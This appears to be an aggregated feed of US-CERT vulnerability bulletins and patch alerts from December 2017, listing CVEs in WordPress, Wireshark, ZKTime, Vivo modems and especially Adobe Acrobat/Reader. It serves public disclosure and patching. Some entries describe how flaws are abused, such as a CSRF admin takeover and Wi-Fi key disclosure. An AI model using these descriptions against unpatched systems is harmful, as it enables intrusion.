 		Vivo modems allow remote attackers to obtain sensitive information by reading the index.cgi?page=wifi HTML source code, as demonstrated by ssid and psk_wepkey fields.2017-12-08not yet calculatedCVE-2017-17463
MISC
vmware -- vmware
 		The implementation of the OSPF protocol in VMware NSX-V Edge 6.2.x prior to 6.2.8 and NSX-V Edge 6.3.x prior to 6.3.3 doesn't correctly handle the link-state advertisement (LSA). A rogue LSA may exploit this issue resulting in continuous sending of LSAs between two routers eventually going in loop or loss of connectivity.2017-12-05not yet calculatedCVE-2017-4920
BID
CONFIRM
wireshark -- wireshark
 		In Wireshark 2.4.0 to 2.4.2 and 2.2.0 to 2.2.10, the CIP Safety dissector could crash. This was addressed in epan/dissectors/packet-cipsafety.c by validating the packet length.2017-12-01not yet calculatedCVE-2017-17085
BID
CONFIRM
CONFIRM
CONFIRM
wireshark -- wireshark
 		In Wireshark 2.4.0 to 2.4.2 and 2.2.0 to 2.2.10, the IWARP_MPA dissector could crash. This was addressed in epan/dissectors/packet-iwarp-mpa.c by validating a ULPDU length.2017-12-01not yet calculatedCVE-2017-17084
BID
CONFIRM
CONFIRM
CONFIRM
wireshark -- wireshark
 		In Wireshark 2.4.0 to 2.4.2 and 2.2.0 to 2.2.10, the NetBIOS dissector could crash. This was addressed in epan/dissectors/packet-netbios.c by ensuring that write operations are bounded by the beginning of a buffer.2017-12-01not yet calculatedCVE-2017-17083
BID
CONFIRM
CONFIRM
CONFIRM
wordpress -- wordpress
 		wp-admin/user-new.php in WordPress before 4.9.1 sets the newbloguser key to a string that can be directly derived from the user ID, which allows remote attackers to bypass intended access restrictions by entering this string.2017-12-02not yet calculatedCVE-2017-17091
BID
MISC
MISC
MISC
MISC
wordpress -- wordpress
 		wp-includes/general-template.php in WordPress before 4.9.1 does not properly restrict the lang attribute of an HTML element, which might allow attackers to conduct XSS attacks via the language setting of a site.2017-12-02not yet calculatedCVE-2017-17093
BID
MISC
MISC
MISC
MISC
wordpress -- wordpress
 		The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.2017-12-06not yet calculatedCVE-2017-17451
MISC
MISC
MISC
wordpress -- wordpress
 		wp-includes/functions.php in WordPress before 4.9.1 does not require the unfiltered_html capability for upload of .js files, which might allow remote attackers to conduct XSS attacks via a crafted file.2017-12-02not yet calculatedCVE-2017-17092
BID
MISC
MISC
MISC
MISC
wordpress -- wordpress
 		Cross-site scripting (XSS) vulnerability in the Content Cards plugin before 0.9.7 for WordPress allows remote attackers to inject arbitrary JavaScript via crafted OpenGraph data.2017-12-03not yet calculatedCVE-2017-17096
CONFIRM
MISC
wordpress -- wordpress
 		wp-includes/feed.php in WordPress before 4.9.1 does not properly restrict enclosures in RSS and Atom fields, which might allow attackers to conduct XSS attacks via a crafted URL.2017-12-02not yet calculatedCVE-2017-17094
BID
MISC
MISC
MISC
MISC
zktime -- web_software
 		The ZKTime Web Software 2.0.1.12280 allows the Administrator to elevate the privileges of the application user using a 'password_change()' function of the Modify Password component, reachable via the old_password, new_password1, and new_password2 parameters to the /accounts/password_change/ URI. An attacker takes advantage of this scenario and creates a crafted CSRF link to add himself as an administrator to the ZKTime Web Software. He then uses social engineering methods to trick the administrator into clicking the forged HTTP request. The request is executed and the attacker becomes the Administrator of the ZKTime Web Software. If the vulnerability is successfully exploited, then an attacker (who would be a normal user of the web application) can escalate his privileges and become the administrator of ZKTime Web Software.2017-12-04not yet calculatedCVE-2017-17056
MISC
BID
zktime -- web_software
 		There is a reflected XSS vulnerability in ZKTime Web 2.0.1.12280. The vulnerability exists due to insufficient filtration of user-supplied data in the 'Range' field of the 'Department' module in a Personnel Advanced Query. A remote attacker can execute arbitrary HTML and script code in the browser in the context of the vulnerable application.2017-12-04not yet calculatedCVE-2017-17057
MISC
BID
Back to top

This product is provided subject to this Notification and this Privacy & Use policy.


Microsoft Releases December 2017 Security Updates

December 12, 2017, 12:29 pm
$
0
0
Original release date: December 12, 2017

Microsoft has released updates to address vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review Microsoft's December 2017 Security Update Summary and Deployment Information and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.


Apple Releases Security Updates

December 12, 2017, 4:38 pm
$
0
0
Original release date: December 12, 2017

Apple has released security updates to address vulnerabilities in AirPort Base Station. An attacker could exploit some of these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review the Apple security pages for AirPort Base Station Firmware Update 7.6.9 and Firmware Update 7.7.9 and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.


Transport Layer Security (TLS) Vulnerability

December 13, 2017, 7:46 am
$
0
0
Original release date: December 13, 2017

CERT Coordination Center (CERT/CC) has released information on a Transport Layer Security (TLS) vulnerability. Exploitation of this vulnerability could allow an attacker to access sensitive information.

The TLS vulnerability is also known as Return of Bleichenbacher's Oracle Threat (ROBOT). ROBOT allows an attacker to obtain the RSA key necessary to decrypt TLS traffic under certain conditions. Mitigations include installing updates to affected products as they become available. US-CERT encourages users and administrators to review CERT/CC Vulnerability Note VU #144389.

This product is provided subject to this Notification and this Privacy & Use policy.


Apple Releases Security Updates

December 13, 2017, 2:51 pm
$
0
0
Original release date: December 13, 2017

Apple has released security updates to address vulnerabilities in multiple products. A remote attacker could exploit one of these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review Apple security pages for the following products and apply the necessary updates:

This product is provided subject to this Notification and this Privacy & Use policy.


Google Releases Security Update for Chrome

December 14, 2017, 6:09 pm
$
0
0
Original release date: December 14, 2017

Google has released Chrome version 63.0.3239.108 for Windows, Mac, and Linux. This version addresses a vulnerability that an attacker could exploit to take control of an affected system.

US-CERT encourages users and administrators to review the Chrome Releases page and apply the necessary update.

This product is provided subject to this Notification and this Privacy & Use policy.


Search

SB17-352: Vulnerability Summary for the Week of December 11, 2017

December 17, 2017, 9:24 pm
$
0
0
Original release date: December 18, 2017

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

  • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

  • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

 

High Vulnerabilities

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the MakeAccessible plugin, when creating an internal data structure. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-099.3CVE-2017-16360
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of an out of bounds read vulnerability in the MakeAccesible plugin, when handling font data. It causes an out of bounds memory access, which sometimes triggers an access violation exception. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads, writes, or frees, potentially leading to code corruption, control-flow hijack, or an information leak attack.2017-12-099.3CVE-2017-16362
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the module that handles character codes for certain textual representations. Invalid input leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.2017-12-099.3CVE-2017-16363
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference when handling number format dictionary entries. In this scenario, the input is crafted in way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-099.3CVE-2017-16364
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the True Type2 Font parsing module. A corrupted cmap table input leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.2017-12-099.3CVE-2017-16365
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion overflow vulnerability. The vulnerability leads to an out of bounds memory access. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads or writes -- potentially leading to code corruption, control-flow hijack, or an information leak attack.2017-12-099.3CVE-2017-16367
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability leads to a stack-based buffer overflow condition in the internal Unicode string manipulation module. It is triggered by an invalid PDF file, where a crafted Unicode string causes an out of bounds memory access of a stack allocated buffer, due to improper checks when manipulating an offset of a pointer to the buffer. Attackers can exploit the vulnerability and achieve arbitrary code execution if they can effectively control the accessible memory.2017-12-099.3CVE-2017-16368
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs because of a computation that reads data that is past the end of the target buffer; the computation is a part of the JavaScript engine. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16370
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the JavaScript engine. In this scenario, the input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-099.3CVE-2017-16371
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to untrusted pointer dereference in the JavaScript API engine. In this scenario, the JavaScript input is crafted in way that the computation results with pointer to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result with sensitive data exposure.2017-12-099.3CVE-2017-16372
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference. In this scenario, the input is crafted in way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-099.3CVE-2017-16373
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the JPEG 2000 module. An invalid JPEG 2000 input code stream leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.2017-12-099.3CVE-2017-16374
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the JavaSscript API engine. In this scenario, the JavaScript input is crafted in way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-099.3CVE-2017-16375
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the MakeAccessible plugin. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16376
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is due to a computation that accesses a pointer that has not been initialized in the main DLL. In this case, a computation defines a read from an unexpected memory location. Therefore, an attacker might be able to read sensitive portions of memory.2017-12-099.3CVE-2017-16377
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is due to a computation that accesses a pointer that has not been initialized; the computation occurs during internal AST thread manipulation. In this case, a computation defines a read from an unexpected memory location. Therefore, an attacker might be able to read sensitive portions of memory.2017-12-099.3CVE-2017-16378
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion overflow vulnerability in the graphics rendering engine.2017-12-099.3CVE-2017-16379
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability for a certain file-type extension. Acrobat maintains both a blacklist and whitelist (the user can specify an allowed attachment). However, any file extensions that are neither on the blacklist nor the whitelist can still be opened after displaying a warning prompt.2017-12-099.3CVE-2017-16380
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value when processing TIFF files embedded within an XPS document. Crafted TIFF image input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-099.3CVE-2017-16381
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the image conversion module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16382
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a heap overflow vulnerability when processing a JPEG file embedded within an XPS document.2017-12-099.3CVE-2017-16383
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the exif processing module for a PNG file (during XPS conversion). Invalid input leads to a computation where pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.2017-12-099.3CVE-2017-16384
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in TIFF parsing during XPS conversion. Crafted TIFF image input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-099.3CVE-2017-16385
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the XPS2PDF conversion engine. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16386
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the JPEG2000 codec. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16387
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript API engine. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-099.3CVE-2017-16388
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access. Successful exploitation could lead to arbitrary code execution.2017-12-099.3CVE-2017-16389
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine API. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-099.3CVE-2017-16390
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is a result of untrusted input that is used to calculate an array index; the calculation occurs in the printing functionality. The vulnerability leads to an operation that can write to a memory location that is outside of the memory addresses allocated for the data structure. The specific scenario leads to a write access to a memory location that does not belong to the relevant process address space.2017-12-099.3CVE-2017-16391
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the JPEG processing module. Crafted input with an unexpected JPEG file segment size causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-099.3CVE-2017-16392
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-099.3CVE-2017-16393
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the WebCapture module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16394
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the image conversion module when processing Enhanced Metafile Format (EMF). Crafted EMF input (EMR_STRETCHDIBITS) causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-099.3CVE-2017-16395
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the TIFF processing module. Crafted input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-099.3CVE-2017-16396
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of Enhanced Metafile Format (EMF) processing within the image conversion module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16397
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-099.3CVE-2017-16398
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the XPS parsing module. In this scenario, the input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-099.3CVE-2017-16399
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the JPEG 2000 parser. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16400
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of an image conversion, specifically in Enhanced Metafile Format Plus (EMF +) processing modules. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16401
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the JPEG 2000 module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16402
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the image conversion module that processes Enhanced Metafile Format Plus (EMF+) data. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16403
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of processing Enhanced Metafile Format Plus (EMF+). The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-099.3CVE-2017-16404
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of Acrobat's page display functionality. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16405
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion vulnerability in the EMF processing module. The issue causes the program to access an object using an incompatible type, leading to an out of bounds memory access. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads, writes, or frees -- potentially leading to code corruption, control-flow hijack, or information leak attack.2017-12-099.3CVE-2017-16406
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of handling an EMF EMR_BITBLT record. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-099.3CVE-2017-16407
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the WebCapture module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16408
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the Adobe graphics module responsible for displaying textual data. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16409
BID
SECTRACK
CONFIRM
